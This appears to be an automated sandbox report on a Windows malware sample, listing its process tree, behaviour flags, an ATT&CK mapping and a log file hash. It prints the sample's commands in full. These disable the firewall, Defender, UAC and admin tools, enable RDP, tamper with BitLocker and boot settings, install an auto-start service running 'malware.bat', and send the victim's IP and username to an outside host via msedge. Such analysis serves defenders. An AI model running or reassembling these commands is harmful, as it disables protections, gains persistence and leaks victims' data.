C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.952⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=gsagmhcq\admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a047183⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵
-
C:\Windows\system32\net.exenet user "Admin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"3⤵
-
C:\Windows\system32\find.exefind "BackupProductKeyDefault"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a047183⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 300 /nobreak2⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "GSAGMHCQ$"2⤵
-
C:\Windows\system32\net.exenet user "GSAGMHCQ$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
System Services
1Service Execution
1Command and Scripting Interpreter
2PowerShell
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
